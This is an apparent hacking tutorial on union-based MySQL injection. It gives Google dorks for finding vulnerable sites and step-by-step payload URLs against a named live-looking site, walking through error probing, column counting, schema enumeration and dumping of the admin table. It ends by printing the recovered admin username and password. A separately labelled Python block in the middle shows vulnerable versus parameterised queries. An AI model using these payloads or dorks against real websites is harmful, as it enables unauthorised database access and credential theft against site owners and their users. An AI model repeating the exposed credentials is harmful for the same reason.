Union Based MySQL Injection | SQL Injection



Union Based MySQL Injection Tutorial

Short Introduction:

What is SQL injection?
SQL injection is one of the most popular web application hacking methods. Using a SQL injection attack, an unauthorized person can access the website's database and extract data from it.
What can a hacker do with a SQL injection attack?
* Bypass logins
* Access secret data
* Modify the contents of the website
* Shut down the MySQL server
To find websites vulnerable to SQL injection attacks, people use the Google search engine, searching for keywords known as "Google dorks".
Some well-known dorks:
* inurl:gallery.php?id=
* inurl:photo.php?id=
* inurl:news.php?id=
* inurl:details.php?id=
* inurl:product.php?cat=

Difference Between Integer And String Based SQL Injection:

Integer:
SELECT * FROM pages WHERE page_id=10 [inject]

So the injection would be
test.php?id=1 union select 1,2,3--
Finally you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3--

String:

SELECT * FROM pages WHERE page_id="10" [inject]

So the injection would be
test.php?id=1' union select 1,2,3--+
Finally you get:
SELECT * FROM pages WHERE page_id="10' union select 1,2,3--+"

So in integer-based SQL injection you don't have to put a ', while in string-based SQL injection you have to put a ' to close the string and a + sign at the end. The + is URL-decoded to a space, which MySQL requires after -- for the rest of the line (including the application's own closing quote) to be treated as a comment.
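As an added example, not from this tutorial, here is the integer and string context side by side in Python with an in-memory SQLite table (a hypothetical `pages` schema with three columns, SQLite standing in for MySQL): the unsafe lookups concatenate the id the way the vulnerable queries above do, while the hardened ones validate and bind the value, so the same payloads are only ever compared as data and match nothing.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the tutorial's "pages" table
# (hypothetical schema: page_id, title, body). SQLite is used in place of
# MySQL; the UNION behaviour shown here is the same.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (page_id INTEGER, title TEXT, body TEXT)")
    conn.execute("INSERT INTO pages VALUES (10, 'Home', 'welcome')")
    return conn

def lookup_unsafe_int(conn, raw_id):
    """Integer context: the ?id= value is pasted straight into the SQL."""
    sql = "SELECT page_id, title, body FROM pages WHERE page_id=" + raw_id
    return conn.execute(sql).fetchall()

def lookup_unsafe_str(conn, raw_id):
    """String context: the value is pasted between quotes, so a payload needs
    a closing quote and a trailing comment to swallow the application's quote."""
    sql = "SELECT page_id, title, body FROM pages WHERE page_id='" + raw_id + "'"
    return conn.execute(sql).fetchall()

def is_valid_id(raw_id):
    """Allow-list check: an article id is a short run of digits, nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None

def lookup_safe_int(conn, raw_id):
    """Hardened integer context: validate the type, then bind as a parameter."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a plain integer")
    sql = "SELECT page_id, title, body FROM pages WHERE page_id=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

def lookup_safe_str(conn, raw_id):
    """Hardened string context: a bound parameter is only data, so the quote
    and UNION inside the payload are compared literally and match no row."""
    sql = "SELECT page_id, title, body FROM pages WHERE page_id=?"
    return conn.execute(sql, (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # The tutorial's payloads, already URL-decoded (the trailing + was a space).
    print(lookup_unsafe_int(db, "10 and 0 union select 1,2,3--"))   # [(1, 2, 3)]
    print(lookup_unsafe_str(db, "10' and 0 union select 1,2,3--"))  # [(1, 2, 3)]
    print(lookup_safe_str(db, "10' and 0 union select 1,2,3--"))    # []
    print(is_valid_id("10 and 0 union select 1,2,3--"))             # False
```

With concatenation the `and 0` suppresses the real article and the UNION row (1, 2, 3) is what the page would render; with binding the whole payload is a single value that equals no page_id.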

Quick Tutorial On Union Based SQL Injection: (Basic Injection For Noob To Leet)

http://www.txi.co.in/article.php?id=2

By adding ' at the end we check whether the site is vulnerable or not, like this:

http://www.txi.co.in/article.php?id=2'    you can see an error in the middle of the page.

After checking the vulnerability,
it is time to find the number of columns:
the number of columns returned by the vulnerable query.
For that, replace the single quote (') with an "order by n" clause.
Increase n through 1,2,3,4,5,6,...n until you get an error like "Unknown column".
For example:
http://www.site.com/index.php?id=2 order by 1
http://www.site.com/index.php?id=2 order by 2
http://www.site.com/index.php?id=2 order by 3
http://www.site.com/index.php?id=2 order by 4
Like this:

http://txi.co.in/article.php?id=2' order by 1--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 2--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 3--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 4--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 5--+  (ERROR)

We get an error on order by 5--+,
which means the query returns only 4 columns.

Now,
we do the UNION select:

http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+    

(We select 4 columns because the query has 4 columns, as we got an error on 'order by 5--+'. We use "and 0" to make the original WHERE condition false, so the page shows the UNION row instead of the real article. You can also use "div 0", "and false", etc.)

After that, numbers will show on the screen. Here 2 and 3 are displayed,
which means columns 2 and 3 are the vulnerable (rendered) columns.

Now replace 2 (the vulnerable column) with "group_concat(table_name)"
and at the end write "from information_schema.tables where table_schema=database()".
Like this:

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+

Here we got all tables in the current database.

We need the admin username and password to log in; they should be in the admin table.
Note: admin tables are sometimes named differently, for example users, adminlogin, user_login, etc.

Here we have the admin table named "admin".

Now, to get the columns of the table we use:

Replace "group_concat(table_name)" with "group_concat(column_name)"

and at the end write
"from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+"
(You can use Hackbar (Firefox add-on) to convert the table name into hex.)

Like this:

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(column_name),3,4 from information_Schema.columns where table_name=0x61646d696e--+

The hex value of "admin" is 0x61646d696e (I used Hackbar).

Now we have all columns of that table.

To dump the data from the columns we use:

Replace "group_concat(column_name)" with "group_concat(column_name1, 0x203a20, column_name2)"
(0x203a20 is the hex of " : ", used as a separator between the two values)
and at the end write
from "Table Name Here"--+

Like this:

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4 from admin--+

Here we got the username and password ;) ;)
Username : admin
Password : sairarehman

Do the same for all columns and tables; just check the names of the tables/columns carefully :)

Thanks for reading!

Note : This Is Purely For Sharing Knowledge . We Are Not Responsible For Actions Performed By You.